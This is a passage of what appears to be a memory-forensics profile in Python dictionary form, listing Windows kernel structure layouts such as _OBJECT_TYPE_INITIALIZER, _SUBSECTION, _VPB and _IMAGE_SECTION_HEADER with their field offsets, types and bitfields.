'DeviceObject' : [ 0x20, ['pointer', ['void']]],
'u' : [ 0x24, ['__unnamed_1ea6']],
} ],
'_VF_SUSPECT_DRIVER_ENTRY' : [ 0x18, {
'Links' : [ 0x0, ['_LIST_ENTRY']],
'Loads' : [ 0x8, ['unsigned long']],
'Unloads' : [ 0xc, ['unsigned long']],
'BaseName' : [ 0x10, ['_UNICODE_STRING']],
} ],
'_MMPTE_TIMESTAMP' : [ 0x4, {
'MustBeZero' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'PageFileLow' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 5, native_type='unsigned long')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Transition' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'GlobalTimeStamp' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_SID_AND_ATTRIBUTES_HASH' : [ 0x88, {
'SidCount' : [ 0x0, ['unsigned long']],
'SidAttr' : [ 0x4, ['pointer', ['_SID_AND_ATTRIBUTES']]],
'Hash' : [ 0x8, ['array', 32, ['unsigned long']]],
} ],
'_XSTATE_CONTEXT' : [ 0x20, {
'Mask' : [ 0x0, ['unsigned long long']],
'Length' : [ 0x8, ['unsigned long']],
'Reserved1' : [ 0xc, ['unsigned long']],
'Area' : [ 0x10, ['pointer', ['_XSAVE_AREA']]],
'Reserved2' : [ 0x14, ['unsigned long']],
'Buffer' : [ 0x18, ['pointer', ['void']]],
'Reserved3' : [ 0x1c, ['unsigned long']],
} ],
'_XSAVE_FORMAT' : [ 0x200, {
'ControlWord' : [ 0x0, ['unsigned short']],
'StatusWord' : [ 0x2, ['unsigned short']],
'TagWord' : [ 0x4, ['unsigned char']],
'Reserved1' : [ 0x5, ['unsigned char']],
'ErrorOpcode' : [ 0x6, ['unsigned short']],
'ErrorOffset' : [ 0x8, ['unsigned long']],
'ErrorSelector' : [ 0xc, ['unsigned short']],
'Reserved2' : [ 0xe, ['unsigned short']],
'DataOffset' : [ 0x10, ['unsigned long']],
'DataSelector' : [ 0x14, ['unsigned short']],
'Reserved3' : [ 0x16, ['unsigned short']],
'MxCsr' : [ 0x18, ['unsigned long']],
'MxCsr_Mask' : [ 0x1c, ['unsigned long']],
'FloatRegisters' : [ 0x20, ['array', 8, ['_M128A']]],
'XmmRegisters' : [ 0xa0, ['array', 8, ['_M128A']]],
'Reserved4' : [ 0x120, ['array', 192, ['unsigned char']]],
'StackControl' : [ 0x1e0, ['array', 7, ['unsigned long']]],
'Cr0NpxState' : [ 0x1fc, ['unsigned long']],
} ],
'_MBCB' : [ 0x88, {
'NodeTypeCode' : [ 0x0, ['short']],
'NodeIsInZone' : [ 0x2, ['short']],
'PagesToWrite' : [ 0x4, ['unsigned long']],
'DirtyPages' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
'BitmapRanges' : [ 0x10, ['_LIST_ENTRY']],
'ResumeWritePage' : [ 0x18, ['long long']],
'MostRecentlyDirtiedPage' : [ 0x20, ['long long']],
'BitmapRange1' : [ 0x28, ['_BITMAP_RANGE']],
'BitmapRange2' : [ 0x48, ['_BITMAP_RANGE']],
'BitmapRange3' : [ 0x68, ['_BITMAP_RANGE']],
} ],
'_PS_CPU_QUOTA_BLOCK' : [ 0x880, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'SessionId' : [ 0x8, ['unsigned long']],
'CpuShareWeight' : [ 0xc, ['unsigned long']],
'CapturedWeightData' : [ 0x10, ['_PSP_CPU_SHARE_CAPTURED_WEIGHT_DATA']],
'DuplicateInputMarker' : [ 0x18, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Reserved' : [ 0x18, ['BitField', dict(start_bit = 1, end_bit = 32, native_type='unsigned long')]],
'MiscFlags' : [ 0x18, ['long']],
'BlockCurrentGenerationLock' : [ 0x0, ['unsigned long']],
'CyclesAccumulated' : [ 0x8, ['unsigned long long']],
'CycleCredit' : [ 0x40, ['unsigned long long']],
'BlockCurrentGeneration' : [ 0x48, ['unsigned long']],
'CpuCyclePercent' : [ 0x4c, ['unsigned long']],
'CyclesFinishedForCurrentGeneration' : [ 0x50, ['unsigned char']],
'Cpu' : [ 0x80, ['array', 32, ['_PS_PER_CPU_QUOTA_CACHE_AWARE']]],
} ],
'__unnamed_1ec1' : [ 0x1, {
'AsUCHAR' : [ 0x0, ['unsigned char']],
'NoDomainAccounting' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'IncreasePolicy' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 3, native_type='unsigned char')]],
'DecreasePolicy' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 5, native_type='unsigned char')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 8, native_type='unsigned char')]],
} ],
'PROCESSOR_PERFSTATE_POLICY' : [ 0x1c, {
'Revision' : [ 0x0, ['unsigned long']],
'MaxThrottle' : [ 0x4, ['unsigned char']],
'MinThrottle' : [ 0x5, ['unsigned char']],
'BusyAdjThreshold' : [ 0x6, ['unsigned char']],
'Spare' : [ 0x7, ['unsigned char']],
'Flags' : [ 0x7, ['__unnamed_1ec1']],
'TimeCheck' : [ 0x8, ['unsigned long']],
'IncreaseTime' : [ 0xc, ['unsigned long']],
'DecreaseTime' : [ 0x10, ['unsigned long']],
'IncreasePercent' : [ 0x14, ['unsigned long']],
'DecreasePercent' : [ 0x18, ['unsigned long']],
} ],
'_BUS_EXTENSION_LIST' : [ 0x8, {
'Next' : [ 0x0, ['pointer', ['void']]],
'BusExtension' : [ 0x4, ['pointer', ['_PI_BUS_EXTENSION']]],
} ],
'_CACHED_CHILD_LIST' : [ 0x8, {
'Count' : [ 0x0, ['unsigned long']],
'ValueList' : [ 0x4, ['unsigned long']],
'RealKcb' : [ 0x4, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
} ],
'_KDEVICE_QUEUE' : [ 0x14, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'DeviceListHead' : [ 0x4, ['_LIST_ENTRY']],
'Lock' : [ 0xc, ['unsigned long']],
'Busy' : [ 0x10, ['unsigned char']],
} ],
'_SYSTEM_POWER_STATE_CONTEXT' : [ 0x4, {
'Reserved1' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned long')]],
'TargetSystemState' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 12, native_type='unsigned long')]],
'EffectiveSystemState' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 16, native_type='unsigned long')]],
'CurrentSystemState' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 20, native_type='unsigned long')]],
'IgnoreHibernationPath' : [ 0x0, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'PseudoTransition' : [ 0x0, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long')]],
'Reserved2' : [ 0x0, ['BitField', dict(start_bit = 22, end_bit = 32, native_type='unsigned long')]],
'ContextAsUlong' : [ 0x0, ['unsigned long']],
} ],
'_OBJECT_TYPE_INITIALIZER' : [ 0x50, {
'Length' : [ 0x0, ['unsigned short']],
'ObjectTypeFlags' : [ 0x2, ['unsigned char']],
'CaseInsensitive' : [ 0x2, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'UnnamedObjectsOnly' : [ 0x2, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'UseDefaultObject' : [ 0x2, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'SecurityRequired' : [ 0x2, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'MaintainHandleCount' : [ 0x2, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'MaintainTypeList' : [ 0x2, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'SupportsObjectCallbacks' : [ 0x2, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'ObjectTypeCode' : [ 0x4, ['unsigned long']],
'InvalidAttributes' : [ 0x8, ['unsigned long']],
'GenericMapping' : [ 0xc, ['_GENERIC_MAPPING']],
'ValidAccessMask' : [ 0x1c, ['unsigned long']],
'RetainAccess' : [ 0x20, ['unsigned long']],
'PoolType' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'NonPagedPool', 1: 'PagedPool', 2: 'NonPagedPoolMustSucceed', 3: 'DontUseThisType', 4: 'NonPagedPoolCacheAligned', 5: 'PagedPoolCacheAligned', 6: 'NonPagedPoolCacheAlignedMustS', 7: 'MaxPoolType', 34: 'NonPagedPoolMustSucceedSession', 35: 'DontUseThisTypeSession', 32: 'NonPagedPoolSession', 36: 'NonPagedPoolCacheAlignedSession', 33: 'PagedPoolSession', 38: 'NonPagedPoolCacheAlignedMustSSession', 37: 'PagedPoolCacheAlignedSession'})]],
'DefaultPagedPoolCharge' : [ 0x28, ['unsigned long']],
'DefaultNonPagedPoolCharge' : [ 0x2c, ['unsigned long']],
'DumpProcedure' : [ 0x30, ['pointer', ['void']]],
'OpenProcedure' : [ 0x34, ['pointer', ['void']]],
'CloseProcedure' : [ 0x38, ['pointer', ['void']]],
'DeleteProcedure' : [ 0x3c, ['pointer', ['void']]],
'ParseProcedure' : [ 0x40, ['pointer', ['void']]],
'SecurityProcedure' : [ 0x44, ['pointer', ['void']]],
'QueryNameProcedure' : [ 0x48, ['pointer', ['void']]],
'OkayToCloseProcedure' : [ 0x4c, ['pointer', ['void']]],
} ],
'__unnamed_1ef2' : [ 0x4, {
'LongFlags' : [ 0x0, ['unsigned long']],
'SubsectionFlags' : [ 0x0, ['_MMSUBSECTION_FLAGS']],
} ],
'_SUBSECTION' : [ 0x20, {
'ControlArea' : [ 0x0, ['pointer', ['_CONTROL_AREA']]],
'SubsectionBase' : [ 0x4, ['pointer', ['_MMPTE']]],
'NextSubsection' : [ 0x8, ['pointer', ['_SUBSECTION']]],
'PtesInSubsection' : [ 0xc, ['unsigned long']],
'UnusedPtes' : [ 0x10, ['unsigned long']],
'GlobalPerSessionHead' : [ 0x10, ['pointer', ['_MM_AVL_TABLE']]],
'u' : [ 0x14, ['__unnamed_1ef2']],
'StartingSector' : [ 0x18, ['unsigned long']],
'NumberOfFullSectors' : [ 0x1c, ['unsigned long']],
} ],
'_IO_CLIENT_EXTENSION' : [ 0x8, {
'NextExtension' : [ 0x0, ['pointer', ['_IO_CLIENT_EXTENSION']]],
'ClientIdentificationAddress' : [ 0x4, ['pointer', ['void']]],
} ],
'_PS_PER_CPU_QUOTA_CACHE_AWARE' : [ 0x40, {
'SortedListEntry' : [ 0x0, ['_LIST_ENTRY']],
'IdleOnlyListHead' : [ 0x8, ['_LIST_ENTRY']],
'CycleBaseAllowance' : [ 0x10, ['unsigned long long']],
'CyclesRemaining' : [ 0x18, ['long long']],
'CurrentGeneration' : [ 0x20, ['unsigned long']],
} ],
'_ETW_BUFFER_CONTEXT' : [ 0x4, {
'ProcessorNumber' : [ 0x0, ['unsigned char']],
'Alignment' : [ 0x1, ['unsigned char']],
'LoggerId' : [ 0x2, ['unsigned short']],
} ],
'_PROC_IDLE_SNAP' : [ 0x10, {
'Time' : [ 0x0, ['unsigned long long']],
'Idle' : [ 0x8, ['unsigned long long']],
} ],
'_KERNEL_STACK_SEGMENT' : [ 0x14, {
'StackBase' : [ 0x0, ['unsigned long']],
'StackLimit' : [ 0x4, ['unsigned long']],
'KernelStack' : [ 0x8, ['unsigned long']],
'InitialStack' : [ 0xc, ['unsigned long']],
'ActualLimit' : [ 0x10, ['unsigned long']],
} ],
'_KEXECUTE_OPTIONS' : [ 0x1, {
'ExecuteDisable' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'ExecuteEnable' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'DisableThunkEmulation' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'Permanent' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'ExecuteDispatchEnable' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'ImageDispatchEnable' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'DisableExceptionChainValidation' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'ExecuteOptions' : [ 0x0, ['unsigned char']],
} ],
'_SEP_TOKEN_PRIVILEGES' : [ 0x18, {
'Present' : [ 0x0, ['unsigned long long']],
'Enabled' : [ 0x8, ['unsigned long long']],
'EnabledByDefault' : [ 0x10, ['unsigned long long']],
} ],
'_WORK_QUEUE_ITEM' : [ 0x10, {
'List' : [ 0x0, ['_LIST_ENTRY']],
'WorkerRoutine' : [ 0x8, ['pointer', ['void']]],
'Parameter' : [ 0xc, ['pointer', ['void']]],
} ],
'_ARBITER_ALLOCATION_STATE' : [ 0x38, {
'Start' : [ 0x0, ['unsigned long long']],
'End' : [ 0x8, ['unsigned long long']],
'CurrentMinimum' : [ 0x10, ['unsigned long long']],
'CurrentMaximum' : [ 0x18, ['unsigned long long']],
'Entry' : [ 0x20, ['pointer', ['_ARBITER_LIST_ENTRY']]],
'CurrentAlternative' : [ 0x24, ['pointer', ['_ARBITER_ALTERNATIVE']]],
'AlternativeCount' : [ 0x28, ['unsigned long']],
'Alternatives' : [ 0x2c, ['pointer', ['_ARBITER_ALTERNATIVE']]],
'Flags' : [ 0x30, ['unsigned short']],
'RangeAttributes' : [ 0x32, ['unsigned char']],
'RangeAvailableAttributes' : [ 0x33, ['unsigned char']],
'WorkSpace' : [ 0x34, ['unsigned long']],
} ],
'_VACB_ARRAY_HEADER' : [ 0x10, {
'VacbArrayIndex' : [ 0x0, ['unsigned long']],
'MappingCount' : [ 0x4, ['unsigned long']],
'HighestMappedIndex' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
} ],
'_MMWSLENTRY' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Hashed' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Direct' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 9, native_type='unsigned long')]],
'Age' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 12, native_type='unsigned long')]],
'VirtualPageNumber' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_DBGKD_SWITCH_PARTITION' : [ 0x4, {
'Partition' : [ 0x0, ['unsigned long']],
} ],
'_DBGKD_GET_VERSION32' : [ 0x28, {
'MajorVersion' : [ 0x0, ['unsigned short']],
'MinorVersion' : [ 0x2, ['unsigned short']],
'ProtocolVersion' : [ 0x4, ['unsigned short']],
'Flags' : [ 0x6, ['unsigned short']],
'KernBase' : [ 0x8, ['unsigned long']],
'PsLoadedModuleList' : [ 0xc, ['unsigned long']],
'MachineType' : [ 0x10, ['unsigned short']],
'ThCallbackStack' : [ 0x12, ['unsigned short']],
'NextCallback' : [ 0x14, ['unsigned short']],
'FramePointer' : [ 0x16, ['unsigned short']],
'KiCallUserMode' : [ 0x18, ['unsigned long']],
'KeUserCallbackDispatcher' : [ 0x1c, ['unsigned long']],
'BreakpointWithStatus' : [ 0x20, ['unsigned long']],
'DebuggerDataList' : [ 0x24, ['unsigned long']],
} ],
'_INTERLOCK_SEQ' : [ 0x8, {
'Depth' : [ 0x0, ['unsigned short']],
'FreeEntryOffset' : [ 0x2, ['unsigned short']],
'OffsetAndDepth' : [ 0x0, ['unsigned long']],
'Sequence' : [ 0x4, ['unsigned long']],
'Exchg' : [ 0x0, ['long long']],
} ],
'_WHEA_TIMESTAMP' : [ 0x8, {
'Seconds' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned long long')]],
'Minutes' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 16, native_type='unsigned long long')]],
'Hours' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 24, native_type='unsigned long long')]],
'Precise' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 25, native_type='unsigned long long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 25, end_bit = 32, native_type='unsigned long long')]],
'Day' : [ 0x0, ['BitField', dict(start_bit = 32, end_bit = 40, native_type='unsigned long long')]],
'Month' : [ 0x0, ['BitField', dict(start_bit = 40, end_bit = 48, native_type='unsigned long long')]],
'Year' : [ 0x0, ['BitField', dict(start_bit = 48, end_bit = 56, native_type='unsigned long long')]],
'Century' : [ 0x0, ['BitField', dict(start_bit = 56, end_bit = 64, native_type='unsigned long long')]],
'AsLARGE_INTEGER' : [ 0x0, ['_LARGE_INTEGER']],
} ],
'_VPB' : [ 0x58, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'Flags' : [ 0x4, ['unsigned short']],
'VolumeLabelLength' : [ 0x6, ['unsigned short']],
'DeviceObject' : [ 0x8, ['pointer', ['_DEVICE_OBJECT']]],
'RealDevice' : [ 0xc, ['pointer', ['_DEVICE_OBJECT']]],
'SerialNumber' : [ 0x10, ['unsigned long']],
'ReferenceCount' : [ 0x14, ['unsigned long']],
'VolumeLabel' : [ 0x18, ['array', 32, ['wchar']]],
} ],
'_CACHE_DESCRIPTOR' : [ 0xc, {
'Level' : [ 0x0, ['unsigned char']],
'Associativity' : [ 0x1, ['unsigned char']],
'LineSize' : [ 0x2, ['unsigned short']],
'Size' : [ 0x4, ['unsigned long']],
'Type' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {0: 'CacheUnified', 1: 'CacheInstruction', 2: 'CacheData', 3: 'CacheTrace'})]],
} ],
'_FILE_BASIC_INFORMATION' : [ 0x28, {
'CreationTime' : [ 0x0, ['_LARGE_INTEGER']],
'LastAccessTime' : [ 0x8, ['_LARGE_INTEGER']],
'LastWriteTime' : [ 0x10, ['_LARGE_INTEGER']],
'ChangeTime' : [ 0x18, ['_LARGE_INTEGER']],
'FileAttributes' : [ 0x20, ['unsigned long']],
} ],
'_SECURITY_SUBJECT_CONTEXT' : [ 0x10, {
'ClientToken' : [ 0x0, ['pointer', ['void']]],
'ImpersonationLevel' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'SecurityAnonymous', 1: 'SecurityIdentification', 2: 'SecurityImpersonation', 3: 'SecurityDelegation'})]],
'PrimaryToken' : [ 0x8, ['pointer', ['void']]],
'ProcessAuditId' : [ 0xc, ['pointer', ['void']]],
} ],
'_KiIoAccessMap' : [ 0x2024, {
'DirectionMap' : [ 0x0, ['array', 32, ['unsigned char']]],
'IoMap' : [ 0x20, ['array', 8196, ['unsigned char']]],
} ],
'_PF_KERNEL_GLOBALS' : [ 0x40, {
'AccessBufferAgeThreshold' : [ 0x0, ['unsigned long long']],
'AccessBufferRef' : [ 0x8, ['_EX_RUNDOWN_REF']],
'AccessBufferExistsEvent' : [ 0xc, ['_KEVENT']],
'AccessBufferMax' : [ 0x1c, ['unsigned long']],
'AccessBufferList' : [ 0x20, ['_SLIST_HEADER']],
'StreamSequenceNumber' : [ 0x28, ['long']],
'Flags' : [ 0x2c, ['unsigned long']],
'ScenarioPrefetchCount' : [ 0x30, ['long']],
} ],
'_ARBITER_QUERY_ARBITRATE_PARAMETERS' : [ 0x4, {
'ArbitrationList' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
} ],
'_ARBITER_BOOT_ALLOCATION_PARAMETERS' : [ 0x4, {
'ArbitrationList' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
} ],
'_POP_SYSTEM_IDLE' : [ 0x38, {
'AverageIdleness' : [ 0x0, ['long']],
'LowestIdleness' : [ 0x4, ['long']],
'Time' : [ 0x8, ['unsigned long']],
'Timeout' : [ 0xc, ['unsigned long']],
'LastUserInput' : [ 0x10, ['unsigned long']],
'Action' : [ 0x14, ['POWER_ACTION_POLICY']],
'MinState' : [ 0x20, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'SystemRequired' : [ 0x24, ['unsigned char']],
'IdleWorker' : [ 0x25, ['unsigned char']],
'Sampling' : [ 0x26, ['unsigned char']],
'LastTick' : [ 0x28, ['unsigned long long']],
'LastSystemRequiredTime' : [ 0x30, ['unsigned long']],
} ],
'_VF_TARGET_ALL_SHARED_EXPORT_THUNKS' : [ 0xc, {
'SharedExportThunks' : [ 0x0, ['pointer', ['_VERIFIER_SHARED_EXPORT_THUNK']]],
'PoolSharedExportThunks' : [ 0x4, ['pointer', ['_VERIFIER_SHARED_EXPORT_THUNK']]],
'OrderDependentSharedExportThunks' : [ 0x8, ['pointer', ['_VERIFIER_SHARED_EXPORT_THUNK']]],
} ],
'_ETW_REF_CLOCK' : [ 0x10, {
'StartTime' : [ 0x0, ['_LARGE_INTEGER']],
'StartPerfClock' : [ 0x8, ['_LARGE_INTEGER']],
} ],
'_OB_DUPLICATE_OBJECT_STATE' : [ 0x18, {
'SourceProcess' : [ 0x0, ['pointer', ['_EPROCESS']]],
'SourceHandle' : [ 0x4, ['pointer', ['void']]],
'Object' : [ 0x8, ['pointer', ['void']]],
'TargetAccess' : [ 0xc, ['unsigned long']],
'ObjectInfo' : [ 0x10, ['_HANDLE_TABLE_ENTRY_INFO']],
'HandleAttributes' : [ 0x14, ['unsigned long']],
} ],
'_MMPTE_SUBSECTION' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'SubsectionAddressLow' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'SubsectionAddressHigh' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 32, native_type='unsigned long')]],
} ],
'_POWER_STATE' : [ 0x4, {
'SystemState' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'DeviceState' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]],
} ],
'_EFI_FIRMWARE_INFORMATION' : [ 0x10, {
'FirmwareVersion' : [ 0x0, ['unsigned long']],
'VirtualEfiRuntimeServices' : [ 0x4, ['pointer', ['_VIRTUAL_EFI_RUNTIME_SERVICES']]],
'SetVirtualAddressMapStatus' : [ 0x8, ['long']],
'MissedMappingsCount' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_1f53' : [ 0xc, {
'Start' : [ 0x0, ['_LARGE_INTEGER']],
'Length' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f55' : [ 0xc, {
'Level' : [ 0x0, ['unsigned short']],
'Group' : [ 0x2, ['unsigned short']],
'Vector' : [ 0x4, ['unsigned long']],
'Affinity' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f57' : [ 0xc, {
'Group' : [ 0x0, ['unsigned short']],
'MessageCount' : [ 0x2, ['unsigned short']],
'Vector' : [ 0x4, ['unsigned long']],
'Affinity' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f59' : [ 0xc, {
'Raw' : [ 0x0, ['__unnamed_1f57']],
'Translated' : [ 0x0, ['__unnamed_1f55']],
} ],
'__unnamed_1f5b' : [ 0xc, {
'Channel' : [ 0x0, ['unsigned long']],
'Port' : [ 0x4, ['unsigned long']],
'Reserved1' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f5d' : [ 0xc, {
'Start' : [ 0x0, ['unsigned long']],
'Length' : [ 0x4, ['unsigned long']],
'Reserved' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f5f' : [ 0xc, {
'DataSize' : [ 0x0, ['unsigned long']],
'Reserved1' : [ 0x4, ['unsigned long']],
'Reserved2' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f61' : [ 0xc, {
'Start' : [ 0x0, ['_LARGE_INTEGER']],
'Length40' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f63' : [ 0xc, {
'Start' : [ 0x0, ['_LARGE_INTEGER']],
'Length48' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f65' : [ 0xc, {
'Start' : [ 0x0, ['_LARGE_INTEGER']],
'Length64' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f67' : [ 0xc, {
'Generic' : [ 0x0, ['__unnamed_1f53']],
'Port' : [ 0x0, ['__unnamed_1f53']],
'Interrupt' : [ 0x0, ['__unnamed_1f55']],
'MessageInterrupt' : [ 0x0, ['__unnamed_1f59']],
'Memory' : [ 0x0, ['__unnamed_1f53']],
'Dma' : [ 0x0, ['__unnamed_1f5b']],
'DevicePrivate' : [ 0x0, ['__unnamed_1e3f']],
'BusNumber' : [ 0x0, ['__unnamed_1f5d']],
'DeviceSpecificData' : [ 0x0, ['__unnamed_1f5f']],
'Memory40' : [ 0x0, ['__unnamed_1f61']],
'Memory48' : [ 0x0, ['__unnamed_1f63']],
'Memory64' : [ 0x0, ['__unnamed_1f65']],
} ],
'_CM_PARTIAL_RESOURCE_DESCRIPTOR' : [ 0x10, {
'Type' : [ 0x0, ['unsigned char']],
'ShareDisposition' : [ 0x1, ['unsigned char']],
'Flags' : [ 0x2, ['unsigned short']],
'u' : [ 0x4, ['__unnamed_1f67']],
} ],
'__unnamed_1f6c' : [ 0x4, {
'PhysicalAddress' : [ 0x0, ['unsigned long']],
'VirtualSize' : [ 0x0, ['unsigned long']],
} ],
'_IMAGE_SECTION_HEADER' : [ 0x28, {
'Name' : [ 0x0, ['array', 8, ['unsigned char']]],
'Misc' : [ 0x8, ['__unnamed_1f6c']],
'VirtualAddress' : [ 0xc, ['unsigned long']],
'SizeOfRawData' : [ 0x10, ['unsigned long']],
'PointerToRawData' : [ 0x14, ['unsigned long']],
'PointerToRelocations' : [ 0x18, ['unsigned long']],
'PointerToLinenumbers' : [ 0x1c, ['unsigned long']],
'NumberOfRelocations' : [ 0x20, ['unsigned short']],
'NumberOfLinenumbers' : [ 0x22, ['unsigned short']],
'Characteristics' : [ 0x24, ['unsigned long']],
} ],
'_ARBITER_ADD_RESERVED_PARAMETERS' : [ 0x4, {
'ReserveDevice' : [ 0x0, ['pointer', ['_DEVICE_OBJECT']]],
} ],
'__unnamed_1f76' : [ 0x50, {
'CellData' : [ 0x0, ['_CELL_DATA']],
'List' : [ 0x0, ['array', 1, ['unsigned long']]],
} ],
'_CM_CACHED_VALUE_INDEX' : [ 0x54, {
'CellIndex' : [ 0x0, ['unsigned long']],
'Data' : [ 0x4, ['__unnamed_1f76']],
} ],
'_CONFIGURATION_COMPONENT_DATA' : [ 0x34, {
'Parent' : [ 0x0, ['pointer', ['_CONFIGURATION_COMPONENT_DATA']]],
'Child' : [ 0x4, ['pointer', ['_CONFIGURATION_COMPONENT_DATA']]],
'Sibling' : [ 0x8, ['pointer', ['_CONFIGURATION_COMPONENT_DATA']]],
'ComponentEntry' : [ 0xc, ['_CONFIGURATION_COMPONENT']],
'ConfigurationData' : [ 0x30, ['pointer', ['void']]],
} ],
'_DBGKD_QUERY_SPECIAL_CALLS' : [ 0x4, {
'NumberOfSpecialCalls' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_1f80' : [ 0x4, {
'Balance' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='long')]],
'Parent' : [ 0x0, ['pointer', ['_MMSUBSECTION_NODE']]],
} ],
'_MMSUBSECTION_NODE' : [ 0x18, {
'u' : [ 0x0, ['__unnamed_1ef2']],
'StartingSector' : [ 0x4, ['unsigned long']],
'NumberOfFullSectors' : [ 0x8, ['unsigned long']],
'u1' : [ 0xc, ['__unnamed_1f80']],
'LeftChild' : [ 0x10, ['pointer', ['_MMSUBSECTION_NODE']]],
'RightChild' : [ 0x14, ['pointer', ['_MMSUBSECTION_NODE']]],
} ],
'_VF_AVL_TREE_NODE' : [ 0x8, {
'p' : [ 0x0, ['pointer', ['void']]],
'RangeSize' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_1f88' : [ 0x8, {
'IdleTime' : [ 0x0, ['unsigned long']],
'NonIdleTime' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_1f8a' : [ 0x8, {
'Disk' : [ 0x0, ['__unnamed_1f88']],
} ],
'_DEVICE_OBJECT_POWER_EXTENSION' : [ 0x40, {
